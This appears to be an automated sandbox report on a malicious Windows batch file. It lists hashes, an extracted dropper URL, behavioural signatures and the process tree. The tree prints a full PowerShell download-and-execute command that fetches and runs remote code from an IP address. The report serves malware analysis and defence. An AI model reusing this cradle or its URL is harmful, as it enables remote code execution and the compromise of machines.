Analysis
  max time kernel:  75s
  max time network: 71s
  platform:         windows10_x64
  resource:         win10
  submitted:        20-06-2020 19:10
Static task: static1

Behavioral task: behavioral1
  Sample:   35e5f8eb351e284b90bed66d0023236b.bat
  Resource: win7v200430 (windows7_x64)
  0 signatures, 0 seconds

Behavioral task: behavioral2
  Sample:   35e5f8eb351e284b90bed66d0023236b.bat
  Resource: win10 (windows10_x64)
  0 signatures, 0 seconds
General
  Target: 35e5f8eb351e284b90bed66d0023236b.bat
  Size:   214B
  MD5:    e2fcc310d8119cd0904e78336960fa89
  SHA1:   de619682273fc1b7211126601c0e1074cc57e246
  SHA256: 1c34218a57d25359c281518cac60c8380aba32fbeea82e9e61585a0c33db7574
  SHA512: 349b96ad50dbb441a256244f07e83cc22f96e212c50cf91ae17d372259c9a37af69e3b548e6a396886b6c50b26da816b897704579916deff8862c4ae77ac0fba
  Score:  10/10
Malware Config
  Extracted
    Language: ps1
    Source:   URLs
      ps1.dropper: http://185.103.242.78/pastes/35e5f8eb351e284b90bed66d0023236b
Signatures

Suspicious use of WriteProcessMemory (3 IoCs)
  Processes:
    description                         pid   process   target process
    PID 2928 wrote to memory of 3796    2928  cmd.exe   powershell.exe
    PID 2928 wrote to memory of 3796    2928  cmd.exe   powershell.exe
    PID 2928 wrote to memory of 3796    2928  cmd.exe   powershell.exe

Program crash (1 IoCs)
  Processes:
    pid   pid_target  process       target process
    3316  3796        WerFault.exe  powershell.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Processes:
    description                pid   process
    Token: SeRestorePrivilege  3316  WerFault.exe
    Token: SeBackupPrivilege   3316  WerFault.exe
    Token: SeDebugPrivilege    3316  WerFault.exe

Suspicious behavior: EnumeratesProcesses (14 IoCs)
  Processes:
    pid   process
    3316  WerFault.exe  (14 identical entries)
Processes

1. C:\Windows\system32\cmd.exe
   Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\35e5f8eb351e284b90bed66d0023236b.bat"
   PID: 2928
   - Suspicious use of WriteProcessMemory

   2. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/35e5f8eb351e284b90bed66d0023236b');Invoke-GKXBUHZ;Start-Sleep -s 10000"
      PID: 3796

      3. C:\Windows\SysWOW64\WerFault.exe
         Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3796 -s 704
         PID: 3316
         - Program crash
         - Suspicious use of AdjustPrivilegeToken
         - Suspicious behavior: EnumeratesProcesses